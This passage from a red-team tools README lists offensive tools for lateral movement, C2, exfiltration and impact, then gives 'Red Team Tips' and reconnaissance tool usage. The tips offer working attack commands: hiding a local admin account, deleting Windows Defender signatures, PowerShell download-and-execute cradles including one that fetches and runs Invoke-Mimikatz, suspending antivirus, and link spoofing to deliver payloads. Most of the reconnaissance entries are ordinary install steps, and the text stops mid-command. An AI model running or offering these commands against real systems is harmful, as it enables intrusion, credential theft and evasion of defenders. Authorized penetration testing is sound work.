\u003Csummary>\u003Cb>Lateral Movement\u003C\u002Fb> 12 tools\u003C\u002Fsummary>\n    \u003Cul>\n        \u003Cul>\n            \u003Cli>\u003Cb>\u003Ca href=\"#crackmapexec\">crackmapexec\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows\u002FActive Directory lateral movement toolkit\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#wmiops\">WMIOps\u003C\u002Fa>\u003C\u002Fb>\u003Ci> WMI remote commands\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#powerlessshell\">PowerLessShell\u003C\u002Fa>\u003C\u002Fb>\u003Ci> PowerShell execution without powershell.exe (via MSBuild)\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#psexec\">PsExec\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Light-weight telnet replacement\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#liquidsnake\">LiquidSnake\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Fileless lateral movement\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#enabling-rdp\">Enabling RDP\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows RDP enable command\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#upgrading-shell-to-meterpreter\">Upgrading 
shell to meterpreter\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Reverse shell improvement\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#forwarding-ports\">Forwarding Ports\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Local port forward command\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#jenkins-reverse-shell\">Jenkins reverse shell\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Jenkins shell command\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#adfspoof\">ADFSpoof\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Forge AD FS security tokens\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#kerbrute\">kerbrute\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Kerberos pre-authentication user enumeration and brute forcing\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#coercer\">Coercer\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Coerce a Windows host to authenticate to an attacker-controlled listener\u003C\u002Fi>\u003C\u002Fli>\n        \u003C\u002Ful>\n    \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n    \u003Csummary>\u003Cb>Collection\u003C\u002Fb> 3 tools\u003C\u002Fsummary>\n    \u003Cul>\n        \u003Cul>\n            \u003Cli>\u003Cb>\u003Ca href=\"#bloodhound\">BloodHound\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Active Directory attack path visualisation\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#snaffler\">Snaffler\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Credential and secret hunting across Active Directory file shares\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#linwinpwn\">linWinPwn\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Active Directory enumeration and vulnerability checks\u003C\u002Fi>\u003C\u002Fli>\n        \u003C\u002Ful>\n    \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n    \u003Csummary>\u003Cb>Command and Control\u003C\u002Fb> 
9 tools\u003C\u002Fsummary>\n    \u003Cul>\n        \u003Cul>\n            \u003Cli>\u003Cb>\u003Ca href=\"#living-off-trusted-sites-project\">Living Off Trusted Sites Project\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Leverage legitimate domains for your C2\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#havoc\">Havoc\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Command and control framework\u003C\u002Fi>\u003C\u002Fli>\n    \t    \u003Cli>\u003Cb>\u003Ca href=\"#covenant\">Covenant\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Command and control framework (.NET)\u003C\u002Fi>\u003C\u002Fli>\n    \t    \u003Cli>\u003Cb>\u003Ca href=\"#merlin\">Merlin\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Command and control framework (Golang)\u003C\u002Fi>\u003C\u002Fli>\n    \t    \u003Cli>\u003Cb>\u003Ca href=\"#metasploit-framework\">Metasploit Framework\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Command and control framework (Ruby)\u003C\u002Fi>\u003C\u002Fli>\n    \t    \u003Cli>\u003Cb>\u003Ca href=\"#pupy\">Pupy\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Command and control framework (Python)\u003C\u002Fi>\u003C\u002Fli>\n    \t    \u003Cli>\u003Cb>\u003Ca href=\"#brute-ratel\">Brute Ratel\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Command and control framework ($$$)\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#nimplant\">NimPlant\u003C\u002Fa>\u003C\u002Fb>\u003Ci> C2 implant written in Nim\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#hoaxshell\">Hoaxshell\u003C\u002Fa>\u003C\u002Fb>\u003Ci> PowerShell reverse shell\u003C\u002Fi>\u003C\u002Fli>\n        \u003C\u002Ful>\n    \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n    \u003Csummary>\u003Cb>Exfiltration\u003C\u002Fb> 6 tools\u003C\u002Fsummary>\n    \u003Cul>\n        \u003Cul>\n\t        \u003Cli>\u003Cb>\u003Ca href=\"#dnscat2\">Dnscat2\u003C\u002Fa>\u003C\u002Fb>\u003Ci> C2 via DNS tunneling\u003C\u002Fi>\u003C\u002Fli>\n\t        \u003Cli>\u003Cb>\u003Ca 
href=\"#cloakify\">Cloakify\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Data transformation for exfiltration\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#pyexfil\">PyExfil\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Data exfiltration PoC\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#powershell-rat\">Powershell RAT\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Python-based backdoor that exfiltrates through Gmail\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#gd-thief\">GD-Thief\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Google Drive exfiltration\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#goshs\">goshs\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Single-binary multi-protocol server for file transfer and exfiltration\u003C\u002Fi>\u003C\u002Fli>\n        \u003C\u002Ful>\n    \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n    \u003Csummary>\u003Cb>Impact\u003C\u002Fb> 4 tools\u003C\u002Fsummary>\n    \u003Cul>\n        \u003Cul>\n            \u003Cli>\u003Cb>\u003Ca href=\"#conti-pentester-guide-leak\">Conti Pentester Guide Leak\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Conti ransomware group affiliate toolkit\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#slowloris\">SlowLoris\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Low-bandwidth HTTP denial of service\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#usbkill\">usbkill\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Anti-forensic kill-switch\u003C\u002Fi>\u003C\u002Fli>\n            \u003Cli>\u003Cb>\u003Ca href=\"#keytap\">Keytap\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Recover pressed keys from typing audio\u003C\u002Fi>\u003C\u002Fli>\n        \u003C\u002Ful>\n    \u003C\u002Ful>\n\u003C\u002Fdetails>\n\nRed Team Tips\n====================\n\n*Learn from Red Teamers with a collection of Red Teaming Tips. 
These tips cover a range of tactics, tools, and methodologies to improve your red teaming abilities.*\n\n### [🔙](#tool-list)Improved HTML smuggling with mouse move eventlistener\n\n**Description:** *'Qakbot added an EventListener for mouse movement to the HTML smuggling attachment for anti-evasion; in sandboxes the zip won't drop.'*\n\n**Credit:** [@pr0xylife](https:\u002F\u002Fx.com\u002Fpr0xylife)\n\n**Link:** [Twitter](https:\u002F\u002Fx.com\u002Fpr0xylife\u002Fstatus\u002F1598410732516802563)\n\n### [🔙](#tool-list)Google translate for phishing\n\n**Description:** *A credential-stealing phishing page proxied through Google Translate's page-view functionality, so the victim sees a Google-hosted URL rather than the attacker's domain.*\n\n**Credit:** [@malmoeb](https:\u002F\u002Fx.com\u002Fmalmoeb)\n\n**Link:** [Twitter](https:\u002F\u002Fx.com\u002Fmalmoeb\u002Fstatus\u002F1671106885590630400)\n\n### [🔙](#tool-list)Hiding the local admin account\n\n```cmd\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" \u002Fv \u003Cusername> \u002Ft REG_DWORD \u002Fd 0 \u002Ff\n```\n\n**Description:** *'Creating accounts is risky when evading blue, but when creating a local admin, use some cute sorcery in the registry to hide it.'*\n\n**Credit:** [@Alh4zr3d](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d\u002Fstatus\u002F1612913838999113728)\n\n### [🔙](#tool-list)Cripple windows defender by deleting signatures\n\n```cmd\n\"%ProgramFiles%\\Windows Defender\\MpCmdRun.exe\" -RemoveDefinitions -All\n```\n\n**Description:** *'A bit messy, but if Windows Defender is causing you a big headache, rather than disabling it (which alerts the user), you should just neuter it by deleting all the signatures.'*\n\n**Credit:** [@Alh4zr3d](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d\u002Fstatus\u002F1611005101262389250)\n\n### [🔙](#tool-list)Enable multiple RDP sessions per 
user\n\n```bash\nreg add HKLM\\System\\CurrentControlSet\\Control\\TerminalServer \u002Fv fSingleSessionPerUser \u002Fd 0 \u002Ff\n```\n\n**Description:** *'Sometimes you want to log in to a host via RDP or similar, but your user has an active session. Enable multiple sessions per user.'*\n\n**Credit:** [@Alh4zr3d](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d\u002Fstatus\u002F1609954528425558016)\n\n### [🔙](#tool-list)Sysinternals PsExec.exe local alternative\n\n```bash\nwmic.exe \u002Fnode:10.1.1.1 \u002Fuser:username \u002Fpassword:pass process call create cmd.exe \u002Fc \" command \"\n```\n\n**Description:** *'Are you tired of uploading Sysinternals PsExec.exe when doing lateral movement? Windows has a better alternative preinstalled. Try this instead.'*\n\n**Credit:** [@GuhnooPlusLinux](https:\u002F\u002Ftwitter.com\u002FGuhnooPlusLinux)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002FGuhnooPlusLinux\u002Fstatus\u002F1607473627922063360)\n\n### [🔙](#tool-list)Live off the land port scanner\n\n```bash\n0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(\u003Ctgt_ip>,$_)) \"Port $_ open\"} 2>$null\n```\n\n**Description:** *'When possible, live off the land rather than uploading tools to machines (for many reasons). PowerShell\u002F.NET help. Ex: simple port scanner in Powershell.'*\n\n**Credit:** [@Alh4zr3d](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d\u002Fstatus\u002F1605060950339588096)\n\n### [🔙](#tool-list)Proxy aware PowerShell DownloadString\n\n```bash\n$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString(\"\u003Curl>\")\n```\n\n**Description:** *'Most large orgs are using web proxies these days. The standard PowerShell download cradle is not proxy aware. 
Use this one.'*\n\n**Credit:** [@Alh4zr3d](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d\u002Fstatus\u002F1596192664398966785)\n\n### [🔙](#tool-list)Looking for internal endpoints in browser bookmarks\n\n```bash\ntype \"C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks.bak\" | findstr \u002Fc \"name url\" | findstr \u002Fv \"type\"\n```\n\n**Description:** *'You'd be surprised what you can find out from a user's bookmarks alone. Internal endpoints they can access, for instance.'*\n\n**Credit:** [@Alh4zr3d](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d\u002Fstatus\u002F1595488676389171200)\n\n### [🔙](#tool-list)Query DNS records for enumeration\n\n```bash\nGet-DnsRecord -RecordType A -ZoneName FQDN -Server \u003Cserver hostname>\n```\n\n**Description:** *'Enumeration is 95% of the game. However, launching tons of scans to evaluate the environment is very loud. 
Why not just ask the DC\u002FDNS server for all DNS records?'*\n\n**Credit:** [@Alh4zr3d](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d\u002Fstatus\u002F1587132627823181824)\n\n### [🔙](#tool-list)Unquoted service paths without PowerUp\n\n```bash\nGet-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq \"Auto\" -and $_.PathName -notlike \"C:\\Windows*\" -and $_.PathName -notlike '\"*'} | select PathName,DisplayName,Name\n```\n\n**Description:** *'Finding unquoted service paths without PowerUp'*\n\n**Credit:** [@Alh4zr3d](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d\u002Fstatus\u002F1579254955554136064)\n\n### [🔙](#tool-list)Bypass a disabled command prompt with \u002Fk\n\n```bash\n# Win+R (To bring up Run Box)\ncmd.exe \u002Fk \"whoami\"\n```\n\n**Description:** *'This command prompt has been disabled by your administrator...' This message can usually be seen in environments such as kiosk PCs; a quick, hacky workaround is to use \u002Fk via the Windows Run box. This will carry out the command and then show the restriction message, allowing for command execution.*\n\n**Credit:** Martin Sohn Christensen\n\n**Link:** [Blog](https:\u002F\u002Fimprosec.com\u002Ftech-blog\u002Fthe-command-prompt-has-been-disabled-by-your-administrator-press-any-key-to-continue-or-use-these-weird-tricks-to-bypass-admins-will-hate-you)\n\n### [🔙](#tool-list)Stop windows defender deleting mimikatz.exe\n\n```bash\n(new-object net.webclient).downloadstring('https:\u002F\u002Fraw.githubusercontent[.]com\u002FBC-SECURITY\u002FEmpire\u002Fmain\u002Fempire\u002Fserver\u002Fdata\u002Fmodule_source\u002Fcredentials\u002FInvoke-Mimikatz.ps1')|IEX;inv\n```\n\n**Description:** *'Are you tired of Windows Defender deleting mimikatz.exe? 
Try this instead.'*\n\n**Credit:** [@GuhnooPlusLinux](https:\u002F\u002Ftwitter.com\u002FGuhnooPlusLinux)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002FGuhnooPlusLinux\u002Fstatus\u002F1605629049660809216)\n\n### [🔙](#tool-list)Check if you are in a virtual machine\n\n```bash\nreg query HKLM\\SYSTEM \u002Fs | findstr \u002FS \"VirtualBox VBOX VMWare\"\n```\n\n**Description:** *'Want to know if you are in a Virtual Machine? Query the registry Keys and find out!!! If any results show up then you are in a Virtual Machine.'*\n\n**Credit:** [@dmcxblue](https:\u002F\u002Ftwitter.com\u002Fdmcxblue)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002Fdmcxblue\u002Fstatus\u002F1366779034672136194)\n\n### [🔙](#tool-list)Enumerate AppLocker rules\n\n```\n(Get-AppLockerPolicy -Local).RuleCollections\n\nGet-ChildItem -Path HKLM:Software\\Policies\\Microsoft\\Windows\\SrpV2 -Recurse\n\nreg query HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\SrpV2\\Exe\\\n```\n\n**Description:** *'AppLocker can be a pain. Enumerate to see how painful'*\n\n**Credit:** [@Alh4zr3d](https:\u002F\u002Ftwitter.com\u002FAlh4zr3d)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002Falh4zr3d\u002Fstatus\u002F1614706476412698624)\n\n### [🔙](#tool-list)CMD shortcut with 6 pixels via mspaint\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F223849011-24db49d7-37b0-4dad-a7a6-db046f6cb7da.png)\n\n1. Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels\n2. Zoom in to make the following tasks easier\n3. Using the colour picker, set pixels values to (from left to right):\n    - 1st: R: 10, G: 0, B: 0\n    - 2nd: R: 13, G: 10, B: 13\n    - 3rd: R: 100, G: 109, B: 99\n    - 4th: R: 120, G: 101, B: 46\n    - 5th: R: 0, G: 0, B: 101\n    - 6th: R: 0, G: 0, B: 0\n4. Save it as 24-bit Bitmap (*.bmp;*.dib)\n5. 
Change its extension from bmp to bat and run.\n\n**Description:** *'An unusual, yet effective method of gaining a shell by creating a shortcut to cmd.exe by drawing certain colours in Microsoft Paint. Due to the encoding algorithm used to write BMP files, it is possible to dictate ASCII data written into a file by carefully selecting certain RGB colours.'*\n\n**Credit:** [PenTestPartners](https:\u002F\u002Fwww.pentestpartners.com\u002F)\n\n**Link:** [Blog](https:\u002F\u002Fwww.pentestpartners.com\u002Fsecurity-blog\u002Fbreaking-out-of-citrix-and-other-restricted-desktop-environments\u002F#gainingacommandshell)\n\n### [🔙](#tool-list)Link spoofing with PreventDefault JavaScript method\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F223849419-c65fec83-ca1c-4a20-ac06-ec2de537a748.png)\n\n```html\n\u003C!DOCTYPE html>\n\u003Chtml>\n  \u003Chead>\n    \u003Cmeta charset=\"UTF-8\">\n    \u003Ctitle>PreventDefault Example\u003C\u002Ftitle>\n  \u003C\u002Fhead>\n  \u003Cbody>\n    \u003Ca href=\"https:\u002F\u002Fgoogle.com\" onclick=\"event.preventDefault(); window.location.href = 'https:\u002F\u002Fbing.com';\">Go to Google\u003C\u002Fa>\n  \u003C\u002Fbody>\n\u003C\u002Fhtml>\n```\n\n**Description:** *Threat actors have been observed using this technique to trick victims into clicking spoofed in-page malware download links. Using the PreventDefault JavaScript method you can spoof the hover link to display a legit link `google.com`, but once clicked the victim will be redirected to your malicious link `bing.com`. 
Great for getting victims to download payloads via a controlled site.*\n\n**Link:** [PreventDefault Docs](https:\u002F\u002Fdeveloper.mozilla.org\u002Fen-US\u002Fdocs\u002FWeb\u002FAPI\u002FEvent\u002FpreventDefault)\n\n### [🔙](#tool-list)Check SMB firewall rules with Responder\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F229650380-b651cfc4-896f-4429-b7b4-54d1241a5b39.png)\n\n```powershell\nCopy-Item -Path \"C:\\tmp\\\" -Destination \"\\\\\u003Cip_running_responder>\\c$\"\n```\n\n**Description:** *'When I do a Compromise Assessment, I often ask the customer if I can do a last quick check: `Copy-Item -Path \"C:\\tmp\\\" -Destination \"\\\\\u003Cip_running_responder>\\c$\"`. If Responder could capture the hash, the firewall allows outgoing SMB connections'*\n\n**Credit:** [@malmoeb](https:\u002F\u002Ftwitter.com\u002Fmalmoeb)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002Fmalmoeb\u002Fstatus\u002F1628272928855826433)\n\n### [🔙](#tool-list)Disable AV with SysInternals PsSuspend\n\n![image](https:\u002F\u002Fgithub.com\u002FA-poc\u002FRedTeam-Tools\u002Fassets\u002F100603074\u002F4519f5ad-c177-4550-b9af-238fa73ad66e)\n\n**Description:** *Using the Microsoft Sysinternals tool PsSuspend.exe it's possible to suspend some AV service executables. The Microsoft signed tool can be passed the PID or Name of a running service, it will suspend the process via the NtSuspendProcess Windows API.*\n\n**Related Blog Post:** [Bypassing AV via Process Suspension with PsSuspend.exe](https:\u002F\u002Fmedium.com\u002F@a-poc\u002Fprocess-suspension-with-pssuspend-exe-0cdf5d16a3b7)\n\n**Link:** [Twitter](https:\u002F\u002Ftwitter.com\u002F0gtweet\u002Fstatus\u002F1638069413717975046)\n\nReconnaissance\n====================\n\n### [🔙](#tool-list)[spiderfoot](https:\u002F\u002Fgithub.com\u002Fsmicallef\u002Fspiderfoot)\n\nSpiderFoot is an open source intelligence (OSINT) automation tool. 
It integrates with just about every data source available and utilises a range of methods for data analysis, making that data easy to navigate.\n\nSpiderFoot can be used offensively (e.g. in a red team exercise or penetration test) for reconnaissance of your target or defensively to gather information about what you or your organisation might have exposed over the Internet.\n\n**Install:** \n\n```bash\nwget https:\u002F\u002Fgithub.com\u002Fsmicallef\u002Fspiderfoot\u002Farchive\u002Fv4.0.tar.gz\ntar zxvf v4.0.tar.gz\ncd spiderfoot-4.0\npip3 install -r requirements.txt\n```\n\nFor full installation instructions see [here](https:\u002F\u002Fgithub.com\u002Fsmicallef\u002Fspiderfoot?tab=readme-ov-file#installing--running).\n\n**Usage:** \n\n```python\npython3 .\u002Fsf.py -l 127.0.0.1:5001\n```\n\nLots of usage tutorial videos [here](https:\u002F\u002Fasciinema.org\u002F~spiderfoot)\n\n![spiderfoot](https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002F1ce26a9e-6fa5-4987-9aea-4943b9c2efec)\n\n*Image used from https:\u002F\u002Fgithub.com\u002Fsmicallef\u002Fspiderfoot*\n\n### [🔙](#tool-list)[reconftw](https:\u002F\u002Fgithub.com\u002Fsix2dez\u002Freconftw)\n\nreconFTW automates the entire process of reconnaissance for you. 
It performs subdomain enumeration along with various vulnerability checks, gathering as much information as possible about your target.\n\n**Install:** \n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fsix2dez\u002Freconftw.git;cd reconftw\u002F;.\u002Finstall.sh\n```\n\nFor full installation instructions see [here](https:\u002F\u002Fgithub.com\u002Fsix2dez\u002Freconftw\u002Fwiki\u002F0.-Installation-Guide).\n\n**Usage:** \n\n```bash\n# Single target domain\n.\u002Freconftw.sh -d target.com -r\n\n# One target with multiple domains\n.\u002Freconftw.sh -m target -l domains.txt -r\n\n# Passive recon\n.\u002Freconftw.sh -d target.com -p\n\n# Perform all checks and exploitations\n.\u002Freconftw.sh -d target.com -a\n```\n\nFor full usage instructions see [here](https:\u002F\u002Fgithub.com\u002Fsix2dez\u002Freconftw\u002Fwiki\u002F2.-Usage-Guide).\n\n![reconftw](https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002F1a5abeb5-776d-4c10-a02c-934e1662d817)\n\n*Image used from https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=TQmDAtkD1Wo*\n\n### [🔙](#tool-list)[subzy](https:\u002F\u002Fgithub.com\u002FPentestPad\u002Fsubzy)\n\nSubdomain takeover tool which works based on matching response fingerprints from [can-i-take-over-xyz](https:\u002F\u002Fgithub.com\u002FEdOverflow\u002Fcan-i-take-over-xyz\u002Fblob\u002Fmaster\u002FREADME.md).\n\n**Install:** \n\n```bash\ngo install -v github.com\u002FPentestPad\u002Fsubzy@latest\n```\n\nFor full installation instructions see [here](https:\u002F\u002Fgithub.com\u002FPentestPad\u002Fsubzy?tab=readme-ov-file#installation).\n\n**Usage:** \n\n```bash\n# List of subdomains\n.\u002Fsubzy run --targets list.txt\n\n# Single or multiple targets\n.\u002Fsubzy run --target test.google.com\n.\u002Fsubzy run --target test.google.com,https:\u002F\u002Ftest.yahoo.com\n```\n\n![subzy](https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002Fd06bff41-8c0f-4d3d-b42e-1221b9866332)\n\n*Image used from 
https:\u002F\u002Fwww.geeksforgeeks.org\u002Fsubzy-subdomain-takeover-vulnerability-checker-tool\u002F*\n\n### [🔙](#tool-list)[smtp-user-enum](https:\u002F\u002Fgithub.com\u002Fcytopia\u002Fsmtp-user-enum)\n\nSMTP user enumeration via VRFY, EXPN and RCPT with clever timeout, retry and reconnect functionality.\n\n**Install:** \n\n```bash\npip install smtp-user-enum\n```\n\n**Usage:** \n\n```bash\nsmtp-user-enum [options] -u\u002F-U host port\nsmtp-user-enum --help\nsmtp-user-enum --version\n```\n\n![smtp-user-enum](https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002F2a965690-52f3-412a-90e3-54dd69e0b275)\n\n*Image used from https:\u002F\u002Fwww.kali.org\u002Ftools\u002Fsmtp-user-enum\u002F*\n\n### [🔙](#tool-list)crt.sh -> httprobe -> EyeWitness\n\nI have put together a bash one-liner that: \n- Passively collects a list of subdomains from certificate associations ([crt.sh](https:\u002F\u002Fcrt.sh\u002F))\n- Actively requests each subdomain to verify its existence ([httprobe](https:\u002F\u002Fgithub.com\u002Ftomnomnom\u002Fhttprobe))\n- Actively screenshots each subdomain for manual review ([EyeWitness](https:\u002F\u002Fgithub.com\u002FFortyNorthSecurity\u002FEyeWitness))\n\n**Usage:** \n\n```bash\ndomain=DOMAIN_COM;rand=$RANDOM;curl -fsSL \"https:\u002F\u002Fcrt.sh\u002F?q=${domain}\" | pup 'td text{}' | grep \"${domain}\" | sort -n | uniq | httprobe > \u002Ftmp\u002Fenum_tmp_${rand}.txt; python3 \u002Fusr\u002Fshare\u002Feyewitness\u002FEyeWitness.py -f \u002Ftmp\u002Fenum_tmp_${rand}.txt --web\n```\n\n*Note: You must have [httprobe](https:\u002F\u002Fgithub.com\u002Ftomnomnom\u002Fhttprobe), [pup](https:\u002F\u002Fgithub.com\u002FEricChiang\u002Fpup) and [EyeWitness](https:\u002F\u002Fgithub.com\u002FFortyNorthSecurity\u002FEyeWitness) installed and change 'DOMAIN_COM' to the target domain. 
You are able to run this script concurrently in terminal windows if you have multiple target root domains*\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F192104474-5836138a-4a61-44fd-b3e3-b2a908c2928e.png)\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F192104501-e038aff8-1e51-4cc3-a286-54e93408ed4e.png)\n\n### [🔙](#tool-list)[jsendpoints](https:\u002F\u002Ftwitter.com\u002Frenniepak\u002Fstatus\u002F1602620834463588352)\n\nA JavaScript bookmarklet for extracting all webpage endpoint links on a page.\n\nCreated by [@renniepak](https:\u002F\u002Ftwitter.com\u002Frenniepak), this JavaScript code snippet can be used to extract all endpoints (starting with \u002F) from the current webpage DOM including all external script sources embedded on the webpage.\n\n```javascript\njavascript:(function(){var scripts=document.getElementsByTagName(\"script\"),regex=\u002F(?\u003C=(\\\"|\\'|\\`))\\\u002F[a-zA-Z0-9_?&=\\\u002F\\-\\#\\.]*(?=(\\\"|\\'|\\`))\u002Fg;const results=new Set;for(var i=0;i\u003Cscripts.length;i++){var t=scripts[i].src;\"\"!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log(\"An error occurred: \",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+\"\u003Cbr>\")})}setTimeout(writeResults,3e3);})();\n```\n\n**Usage (Bookmarklet)** \n\nCreate a bookmarklet...\n\n- `Right click your bookmark bar`\n- `Click 'Add Page'`\n- `Paste the above Javascript in the 'url' box`\n- `Click 'Save'`\n\n...then visit the victim page in the browser and click the bookmarklet.\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F207563211-6c69711a-f7e7-4451-862b-80c9849df7fe.png)\n\n**Usage (Console)** \n\nPaste the above 
Javascript into the console window `F12` and press enter. \n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F207563598-d70171b5-823e-491e-a6d5-8657af28b0e5.png)\n\n### [🔙](#tool-list)[nuclei](https:\u002F\u002Fgithub.com\u002Fprojectdiscovery\u002Fnuclei)\n\nFast vulnerability scanner that uses .yaml templates to search for specific issues.\n\n**Install:** \n\n```bash\ngo install -v github.com\u002Fprojectdiscovery\u002Fnuclei\u002Fv2\u002Fcmd\u002Fnuclei@latest\n```\n\n**Usage:** \n\n```bash\ncat domains.txt | nuclei -t \u002FPATH\u002Fnuclei-templates\u002F\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F205439027-2afe4ef8-fc7a-410d-934f-f8d325a8176e.png)\n\n### [🔙](#tool-list)[certSniff](https:\u002F\u002Fgithub.com\u002FA-poc\u002FcertSniff)\n\ncertSniff is a Certificate Transparency logs keyword watcher I wrote in Python. It uses the certstream library to watch for certificate creation logs that contain keywords, defined in a file.\n\nYou can set this running with several keywords relating to your victim domain, any certificate creations will be recorded and may lead to the discovery of domains you were previously unaware of.\n\n**Install:** \n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002FA-poc\u002FcertSniff;cd certSniff\u002F;pip install -r requirements.txt\n```\n\n**Usage:** \n\n```python\npython3 certSniff.py 